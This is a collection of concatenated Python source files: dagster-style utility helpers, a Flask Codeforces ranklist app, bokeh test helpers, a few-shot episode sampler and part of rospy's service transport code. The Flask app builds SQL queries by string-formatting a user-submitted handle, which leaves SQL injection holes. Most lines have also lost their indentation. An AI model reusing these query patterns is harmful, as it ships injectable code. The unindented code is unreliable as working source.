Note: this function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
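# Illustrative sketch (not part of the original module): because the path is resolved
# against the *caller's* file, a test module can locate fixtures that live beside it
# regardless of the current working directory. 'fixtures/env.yaml' is a hypothetical path.
def _example_script_relative_path_usage():
    return script_relative_path('fixtures/env.yaml')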
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
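# Illustrative sketch (not part of the original module): the __reduce__/__setstate__ pair
# above lets a frozendict survive a pickle round trip without ever invoking the disabled
# __setitem__, and the restored copy remains read-only.
def _example_frozendict_pickle_roundtrip():
    import pickle

    original = frozendict({'a': 1, 'b': 2})
    restored = pickle.loads(pickle.dumps(original, PICKLE_PROTOCOL))
    assert restored == original
    try:
        restored['c'] = 3
    except RuntimeError:
        pass  # mutation is still blocked after unpickling
    return restored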
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
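# Illustrative sketch (not part of the original module; function names are placeholders):
# using the returned context keeps child-process start behavior consistent across
# platforms ('spawn' wherever get_context is available).
def _example_spawn_context_worker(queue):
    queue.put('done')  # trivial unit of work performed in the child process

def _example_run_in_spawn_context():
    ctx = get_multiprocessing_context()
    queue = ctx.Queue()
    proc = ctx.Process(target=_example_spawn_context_worker, args=(queue,))
    proc.start()
    result = queue.get()
    proc.join()
    return result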
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-n', pipeline_fn_name]
if env_file:
cli_cmd.append('-e')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
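# Illustrative sketch (not part of the original module): the context manager yields a
# path rather than an open file object, so the caller may re-open it (or hand it to a
# subprocess) and it is removed when the block exits.
def _example_safe_tempfile_usage():
    with safe_tempfile_path() as path:
        with open(path, 'w') as f:
            f.write('scratch data')
        with open(path, 'r') as f:
            return f.read()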
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
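# Illustrative sketch (not part of the original module; function names are placeholders):
# a cancellable child process shares an Event created from the same multiprocessing
# context and starts the watcher thread; the parent cancels it by setting the event.
def _example_cancellable_child(termination_event):
    start_termination_thread(termination_event)
    # ... long-running work that the resulting KeyboardInterrupt/SIGINT can break out of ...

def _example_cancel_child_from_parent():
    ctx = get_multiprocessing_context()
    termination_event = ctx.Event()
    proc = ctx.Process(target=_example_cancellable_child, args=(termination_event,))
    proc.start()
    termination_event.set()  # request cancellation
    proc.join()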
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
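# Illustrative sketch (not part of the original module): frozentags hashes by its sorted
# items, so equal tag sets hash identically regardless of construction order, and
# updated_with returns a new instance instead of mutating in place.
def _example_frozentags_usage():
    base = frozentags({'env': 'prod', 'team': 'data'})
    assert hash(base) == hash(frozentags({'team': 'data', 'env': 'prod'}))
    updated = base.updated_with({'env': 'staging'})
    assert updated['env'] == 'staging' and base['env'] == 'prod'
    return updated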
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
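# Illustrative sketch (not part of the original module; _ExampleContext and the event
# strings are made-up placeholders): events yielded before the typed object come out of
# generate_setup_events, the object itself from get_object, and the remainder from
# generate_teardown_events.
class _ExampleContext(object):
    pass

def _example_context_event_stream():
    yield 'setup_started'
    yield _ExampleContext()
    yield 'teardown_finished'

def _example_event_generation_manager_usage():
    manager = EventGenerationManager(_example_context_event_stream(), _ExampleContext)
    setup_events = list(manager.generate_setup_events())       # ['setup_started']
    context = manager.get_object()                              # the _ExampleContext instance
    teardown_events = list(manager.generate_teardown_events())  # ['teardown_finished']
    return setup_events, context, teardown_events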
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
|
app.py
|
import requests,schedule,sqlite3,json
from operator import itemgetter
from flask import Flask,render_template,session,request,redirect,url_for,flash
import os
import multiprocessing
import time
app = Flask(__name__)
cursor = sqlite3.connect('ranklist.db',check_same_thread=False)
cursor2 = sqlite3.connect('ranklist.db',check_same_thread=False)
cursor.execute('''
CREATE TABLE IF NOT EXISTS handles(
handle varchar(100) PRIMARY KEY,
solved int
);
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS problems(
name varchar(100) PRIMARY KEY,
link varchar(1000),
solved int,
level varchar(2)
);
''')
@app.route("/new_here")
def new_here():
return render_template('add_handle.html')
@app.route("/add_handle",methods = ['GET','POST'])
def add():
if request.method == 'POST':
url = "https://codeforces.com/api/user.status?handle=%s" %(request.form['handle'])
req = requests.get(url)
jobj = json.loads(req.text)
error = False
duplicate = False
if jobj['status'] != "OK":
error = True
else:
qry = "select * from handles where handle = '%s'" %(request.form['handle'])
tmp = cursor.execute(qry)
if tmp.fetchone() == None:
cursor.execute('''insert into handles values (?,?)''',(request.form['handle'],0))
else:
duplicate = True
cursor.commit()
return render_template('add_handle.html',error=error,duplicate=duplicate)
return home()
def update():
print("updating")
pset = []
tmp3 = cursor.execute('''Select * from problems''')
while True:
pname = tmp3.fetchone()
if pname == None:
break
pset.append(pname[0])
#print(pset)
tmp = cursor.execute('''SELECT * from handles''')
while True:
handle = tmp.fetchone()
if handle == None:
break
#print("updating %s" %(handle[0]))
cursor2.execute('''update handles set solved = 0 where handle = '%s' '''%(handle[0]))
tmp = cursor.execute('''Select * from problems''')
while True:
problem = tmp.fetchone()
if problem == None:
break
cursor2.execute('''update problems set solved = 0 where name = '%s'; ''' %(problem[0]))
tmp = cursor.execute('''SELECT handle from handles''')
while True:
handle = tmp.fetchone()
probstatus = dict()
if handle == None:
break
try:
url = "https://codeforces.com/api/user.status?handle=%s" %(handle[0])
sub1 = requests.get(url)
sub = json.loads(sub1.text)
if sub['status'] != "OK":
continue
for stat in sub['result']:
if stat['verdict'] == "OK":
probstatus[stat['problem']['name']] = True
for x in probstatus:
if probstatus[x] == True and x in pset:
#print(x)
qry = '''select * from problems where name = "%s" ''' %(x)
tmp2 = cursor2.execute(qry)
if tmp2.fetchone() != None:
try:
qry = '''update handles set solved = solved+1 where handle = "%s" ''' %(handle[0])
cursor2.execute(qry)
except:
print("not possible here")
try:
qry = '''update problems set solved = solved+1 where name = "%s" ''' %(x)
cursor2.execute(qry)
except:
print("not possible here")
print("done %s" %(handle))
except:
print("skipping %s" %(handle))
cursor.commit()
cursor2.commit()
print("done update")
# return render_template('home.html')
def test():
print("hi")
@app.route("/")
def home():
ranks = []
tmp = cursor.execute('''select * from handles order by solved desc''')
while True:
handle = tmp.fetchone()
if handle==None:
break
ranks.append((handle[0],handle[1]))
return render_template('home.html',ranklist=ranks)
@app.route("/problems")
def problems():
psolves = []
tmp = cursor.execute('''select * from problems order by solved desc''')
while True:
problem = tmp.fetchone()
if problem == None:
break
psolves.append((problem))
return render_template('problems.html',pdata = psolves)
#add dynamic search
def work():
try:
update()
except:
print("update not possible")
schedule.every(10).minutes.do(work)
def run_loop():
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
p = multiprocessing.Process(target=run_loop)
p.start()
app.run(port=os.environ.get("PORT",5000), host='0.0.0.0')
|
test_utils.py
|
import uuid
import tempfile
import threading
import time
import unittest
#import redis
import requests
from requests.exceptions import ConnectionError
from tornado import ioloop
#import zmq
from bokeh.tests.test_utils import skipIfPy3
from ..models import user
from .. import start, configure
from ..app import bokeh_app
from ..settings import settings as server_settings
def wait_flask():
def helper():
try:
return requests.get('http://localhost:5006/bokeh/ping')
except ConnectionError:
return False
return wait_until(helper)
def wait_redis_gone(port):
def helper():
client = redis.Redis(port=port)
try:
client.ping()
return False
except redis.ConnectionError:
return True
return wait_until(helper)
def wait_redis_start(port):
def helper():
client = redis.Redis(port=port)
try:
return client.ping()
except redis.ConnectionError:
pass
return wait_until(helper)
def wait_until(func, timeout=1.0, interval=0.01):
st = time.time()
while True:
if func():
return True
if (time.time() - st) > timeout:
return False
time.sleep(interval)
def recv_timeout(socket, timeout):
poll = zmq.Poller()
poll.register(socket, zmq.POLLIN)
socks = dict(poll.poll(timeout=timeout))
if socks.get(socket, None) == zmq.POLLIN:
return socket.recv_multipart()
else:
return None
class BaseBokehServerTestCase(unittest.TestCase):
options = {}
class MemoryBokehServerTestCase(BaseBokehServerTestCase):
@skipIfPy3("gevent does not work in py3.")
def setUp(self):
#clear tornado ioloop instance
server_settings.model_backend = {'type' : 'memory'}
for k,v in self.options.items():
setattr(server_settings, k, v)
bokeh_app.stdout = None
bokeh_app.stderr = None
self.serverthread = threading.Thread(target=start.start_simple_server)
self.serverthread.start()
wait_flask()
#not great - but no good way to wait for zmq to come up
time.sleep(0.1)
make_default_user(bokeh_app)
def tearDown(self):
start.stop()
self.serverthread.join()
BokehServerTestCase = MemoryBokehServerTestCase
def make_default_user(bokeh_app):
bokehuser = user.new_user(bokeh_app.servermodel_storage, "defaultuser",
str(uuid.uuid4()), apikey='nokey', docs=[])
return bokehuser
|
parallel_sampler_orig.py
|
import time
import datetime
from multiprocessing import Process, Queue, cpu_count
import torch
import numpy as np
# from pytorch_transformers import BertModel
from transformers import BertModel
from . import utils
from . import stats
class ParallelSampler():
def __init__(self, data, args, num_episodes=None):
self.data = data
self.args = args
self.num_episodes = num_episodes
self.all_classes = np.unique(self.data['label'])
self.num_classes = len(self.all_classes)
if self.num_classes < self.args.way:
raise ValueError("Total number of classes is less than #way.")
self.idx_list = []
for y in self.all_classes:
self.idx_list.append(
np.squeeze(np.argwhere(self.data['label'] == y)))
self.count = 0
self.done_queue = Queue()
self.num_cores = cpu_count() if args.n_workers == 0 else args.n_workers
self.p_list = []
for i in range(self.num_cores):
self.p_list.append(
Process(target=self.worker, args=(self.done_queue,)))
for i in range(self.num_cores):
self.p_list[i].start()
def get_epoch(self):
for _ in range(self.num_episodes):
# block until a worker process has produced a task
support, query = self.done_queue.get()
# convert to torch.tensor
support = utils.to_tensor(support, self.args.cuda, ['raw'])
query = utils.to_tensor(query, self.args.cuda, ['raw'])
if self.args.meta_w_target:
if self.args.meta_target_entropy:
w = stats.get_w_target(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
else: # use rr approximation (this one is faster)
w = stats.get_w_target_rr(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
support['w_target'] = w.detach()
query['w_target'] = w.detach()
support['is_support'] = True
query['is_support'] = False
yield support, query
def worker(self, done_queue):
'''
Generate one task (support and query) and put it onto done_queue.
'''
while True:
if done_queue.qsize() > 100:
time.sleep(1)
continue
# sample ways
sampled_classes = np.random.permutation(
self.num_classes)[:self.args.way]
source_classes = []
for j in range(self.num_classes):
if j not in sampled_classes:
source_classes.append(self.all_classes[j])
source_classes = sorted(source_classes)
# sample examples
support_idx, query_idx = [], []
for y in sampled_classes:
tmp = np.random.permutation(len(self.idx_list[y]))
support_idx.append(
self.idx_list[y][tmp[:self.args.shot]])
query_idx.append(
self.idx_list[y][
tmp[self.args.shot:self.args.shot+self.args.query]])
support_idx = np.concatenate(support_idx)
query_idx = np.concatenate(query_idx)
if self.args.mode == 'finetune' and len(query_idx) == 0:
query_idx = support_idx
# aggregate examples
max_support_len = np.max(self.data['text_len'][support_idx])
max_query_len = np.max(self.data['text_len'][query_idx])
support = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
support_idx, max_support_len)
query = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
query_idx, max_query_len)
if self.args.embedding in ['idf', 'meta', 'meta_mlp']:
# compute inverse document frequency over the meta-train set
idf = stats.get_idf(self.data, source_classes)
support['idf'] = idf
query['idf'] = idf
if self.args.embedding in ['iwf', 'meta', 'meta_mlp']:
# compute SIF over the meta-train set
iwf = stats.get_iwf(self.data, source_classes)
support['iwf'] = iwf
query['iwf'] = iwf
if 'pos' in self.args.auxiliary:
support = utils.select_subset(
self.data, support, ['head', 'tail'], support_idx)
query = utils.select_subset(
self.data, query, ['head', 'tail'], query_idx)
done_queue.put((support, query))
def __del__(self):
'''
Need to terminate the processes when deleting the object
'''
for i in range(self.num_cores):
self.p_list[i].terminate()
del self.done_queue
|
tcpros_service.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Internal use: Service-specific extensions for TCPROS support"""
import io
import socket
import struct
import sys
import logging
import time
import traceback
import genpy
import rosgraph
import rosgraph.names
import rosgraph.network
from rospy.exceptions import TransportInitError, TransportTerminated, ROSException, ROSInterruptException
from rospy.service import _Service, ServiceException
from rospy.impl.registration import get_service_manager
from rospy.impl.tcpros_base import TCPROSTransport, TCPROSTransportProtocol, \
get_tcpros_server_address, start_tcpros_server, recv_buff, \
DEFAULT_BUFF_SIZE
from rospy.core import logwarn, loginfo, logerr, logdebug
import rospy.core
import rospy.msg
import rospy.names
import rospy.impl.validators
import threading
if sys.hexversion > 0x03000000: #Python3
def isstring(s):
return isinstance(s, str) #Python 3.x
else:
def isstring(s):
return isinstance(s, basestring) #Python 2.x
logger = logging.getLogger('rospy.service')
#########################################################
# Service helpers
def wait_for_service(service, timeout=None):
"""
Blocks until service is available. Use this in
initialization code if your program depends on a
service already running.
@param service: name of service
@type service: str
@param timeout: timeout time in seconds, None for no
timeout. NOTE: timeout=0 is invalid as wait_for_service actually
contacts the service, so non-blocking behavior is not
possible. For timeout=0 uses cases, just call the service without
waiting.
@type timeout: double
@raise ROSException: if specified timeout is exceeded
@raise ROSInterruptException: if shutdown interrupts wait
"""
master = rosgraph.Master(rospy.names.get_caller_id())
def contact_service(resolved_name, timeout=10.0):
try:
uri = master.lookupService(resolved_name)
except rosgraph.MasterException:
return False
addr = rospy.core.parse_rosrpc_uri(uri)
if rosgraph.network.use_ipv6():
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# we always want to timeout just in case we're connecting
# to a down service.
s.settimeout(timeout)
logdebug('connecting to ' + str(addr))
s.connect(addr)
h = { 'probe' : '1', 'md5sum' : '*',
'callerid' : rospy.core.get_caller_id(),
'service': resolved_name }
rosgraph.network.write_ros_handshake_header(s, h)
return True
finally:
if s is not None:
s.close()
if timeout == 0.:
raise ValueError("timeout must be non-zero")
resolved_name = rospy.names.resolve_name(service)
first = False
if timeout:
timeout_t = time.time() + timeout
while not rospy.core.is_shutdown() and time.time() < timeout_t:
try:
if contact_service(resolved_name, timeout_t-time.time()):
return
time.sleep(0.3)
except KeyboardInterrupt:
# re-raise
rospy.core.logdebug("wait_for_service: received keyboard interrupt, assuming signals disabled and re-raising")
raise
except: # service not actually up
if first:
first = False
rospy.core.logerr("wait_for_service(%s): failed to contact [%s], will keep trying"%(resolved_name, uri))
if rospy.core.is_shutdown():
raise ROSInterruptException("rospy shutdown")
else:
raise ROSException("timeout exceeded while waiting for service %s"%resolved_name)
else:
while not rospy.core.is_shutdown():
try:
if contact_service(resolved_name):
return
time.sleep(0.3)
except KeyboardInterrupt:
# re-raise
rospy.core.logdebug("wait_for_service: received keyboard interrupt, assuming signals disabled and re-raising")
raise
except: # service not actually up
if first:
first = False
rospy.core.logerr("wait_for_service(%s): failed to contact [%s], will keep trying"%(resolved_name, uri))
if rospy.core.is_shutdown():
raise ROSInterruptException("rospy shutdown")
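# Illustrative usage sketch (not part of the original module; 'add_two_ints' and
# AddTwoInts stand in for a user-defined service name and srv type): client code
# typically blocks on the service before constructing a proxy, e.g.
#
#   rospy.wait_for_service('add_two_ints', timeout=5.0)
#   add_two_ints = rospy.ServiceProxy('add_two_ints', AddTwoInts)
#   resp = add_two_ints(1, 2)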
def convert_return_to_response(response, response_class):
"""
Convert return value of function to response instance. The
rules/precedence for this are:
1. If the return type is the same as the response type, no conversion
is done.
2. If the return type is a dictionary, it is used as a keyword-style
initialization for a new response instance.
3. If the return type is *not* a list type, it is passed in as a single arg
to a new response instance.
4. If the return type is a list/tuple type, it is used as a args-style
initialization for a new response instance.
"""
# use this declared ROS type check instead of a direct instance
# check, which allows us to play tricks with serialization and
# deserialization
if isinstance(response, genpy.Message) and response._type == response_class._type:
#if isinstance(response, response_class):
return response
elif type(response) == dict:
# kwds response
try:
return response_class(**response)
except AttributeError as e:
raise ServiceException("handler returned invalid value: %s"%str(e))
elif response is None:
raise ServiceException("service handler returned None")
elif type(response) not in [list, tuple]:
# single, non-list arg
try:
return response_class(response)
except TypeError as e:
raise ServiceException("handler returned invalid value: %s"%str(e))
else:
# user returned a list, which has some ambiguous cases. Our resolution is that
# all list/tuples are converted to *args
try:
return response_class(*response)
except TypeError as e:
raise ServiceException("handler returned wrong number of values: %s"%str(e))
def service_connection_handler(sock, client_addr, header):
"""
Process incoming service connection. For use with
TCPROSServer. Reads in service name from handshake and creates the
appropriate service handler for the connection.
@param sock: socket connection
@type sock: socket
@param client_addr: client address
@type client_addr: (str, int)
@param header: key/value pairs from handshake header
@type header: dict
@return: error string or None
@rtype: str
"""
for required in ['service', 'md5sum', 'callerid']:
if not required in header:
return "Missing required '%s' field"%required
else:
logger.debug("connection from %s:%s", client_addr[0], client_addr[1])
service_name = header['service']
#TODO: make service manager configurable. I think the right
#thing to do is to make these singletons private members of a
#Node instance and enable rospy to have multiple node
#instances.
sm = get_service_manager()
md5sum = header['md5sum']
service = sm.get_service(service_name)
if not service:
return "[%s] is not a provider of [%s]"%(rospy.names.get_caller_id(), service_name)
elif md5sum != rospy.names.SERVICE_ANYTYPE and md5sum != service.service_class._md5sum:
return "request from [%s]: md5sums do not match: [%s] vs. [%s]"%(header['callerid'], md5sum, service.service_class._md5sum)
else:
transport = TCPROSTransport(service.protocol, service_name, header=header)
transport.set_socket(sock, header['callerid'])
transport.write_header()
# using threadpool reduced performance by an order of
# magnitude, need to investigate better
t = threading.Thread(target=service.handle, args=(transport, header))
t.setDaemon(True)
t.start()
class TCPService(TCPROSTransportProtocol):
"""
Protocol implementation for Services over TCPROS
"""
def __init__(self, resolved_name, service_class, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor.
@param resolved_name: name of service
@type resolved_name: str
@param service_class: Service data type class
@type service_class: Service
@param buff_size int: size of buffer (bytes) to use for reading incoming requests.
@type buff_size: int
"""
super(TCPService, self).__init__(resolved_name, service_class._request_class, buff_size=buff_size)
self.service_class = service_class
def get_header_fields(self):
"""
Protocol API
@return: header fields
@rtype: dict
"""
return {'service': self.resolved_name, 'type': self.service_class._type,
'md5sum': self.service_class._md5sum, 'callerid': rospy.names.get_caller_id() }
class TCPROSServiceClient(TCPROSTransportProtocol):
"""Protocol Implementation for Service clients over TCPROS"""
def __init__(self, resolved_name, service_class, headers=None, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor.
@param resolved_name: resolved service name
@type resolved_name: str
@param service_class: Service data type class
@type service_class: Service
@param headers: identifier for Service session
@type headers: dict
@param buff_size: size of buffer (bytes) for reading responses from Service.
@type buff_size: int
"""
super(TCPROSServiceClient, self).__init__(resolved_name, service_class._response_class)
self.service_class = service_class
self.headers = headers or {}
self.buff_size = buff_size
def get_header_fields(self):
"""
TCPROSTransportProtocol API
"""
headers = {'service': self.resolved_name, 'md5sum': self.service_class._md5sum,
'callerid': rospy.names.get_caller_id()}
# The current implementation allows user-supplied headers to
# override protocol-specific headers. We may want to
# eliminate this in the future if it is abused too severely.
for k, v in self.headers.items():
headers[k] = v
return headers
def _read_ok_byte(self, b, sock):
"""
Utility for reading the OK-byte/error-message header preceding each message.
@param sock: socket connection. Will be read from if OK byte is
false and error message needs to be read
@type sock: socket.socket
@param b: buffer to read from
@type b: StringIO
"""
if b.tell() == 0:
return
pos = b.tell()
b.seek(0)
ok = struct.unpack('<B', b.read(1))[0] # read in ok byte
b.seek(pos)
if not ok:
str = self._read_service_error(sock, b)
#_read_ok_byte has to reset state of the buffer to
#consumed as this exception will bypass rest of
#deserialized_messages logic. we currently can't have
#multiple requests in flight, so we can keep this simple
b.seek(0)
b.truncate(0)
raise ServiceException("service [%s] responded with an error: %s"%(self.resolved_name, str))
else:
# success, set seek point to start of message
b.seek(pos)
def read_messages(self, b, msg_queue, sock):
"""
In service implementation, reads in the OK byte that precedes each
response. The OK byte allows for the passing of error messages
instead of a response message
@param b: buffer
@type b: StringIO
@param msg_queue: Message queue to append to
@type msg_queue: [Message]
@param sock: socket to read from
@type sock: socket.socket
"""
self._read_ok_byte(b, sock)
rospy.msg.deserialize_messages(b, msg_queue, self.recv_data_class, queue_size=self.queue_size, max_msgs=1, start=1) #rospy.msg
#deserialize_messages only resets the buffer to the start
#point if everything was consumed, so we have to further reset
#it.
if b.tell() == 1:
b.seek(0)
def _read_service_error(self, sock, b):
"""
Read service error from sock
@param sock: socket to read from
@type sock: socket
@param b: currently read data from sock
@type b: StringIO
"""
buff_size = 256 #can be small given that we are just reading an error string
while b.tell() < 5:
recv_buff(sock, b, buff_size)
bval = b.getvalue()
(length,) = struct.unpack('<I', bval[1:5]) # read the message length field
while b.tell() < (5 + length):
recv_buff(sock, b, buff_size)
bval = b.getvalue()
return struct.unpack('<%ss'%length, bval[5:5+length])[0] # read the error string
class ServiceProxy(_Service):
"""
Create a handle to a ROS service for invoking calls.
Usage::
add_two_ints = ServiceProxy('add_two_ints', AddTwoInts)
resp = add_two_ints(1, 2)
"""
def __init__(self, name, service_class, persistent=False, headers=None):
"""
ctor.
@param name: name of service to call
@type name: str
@param service_class: auto-generated service class
@type service_class: Service class
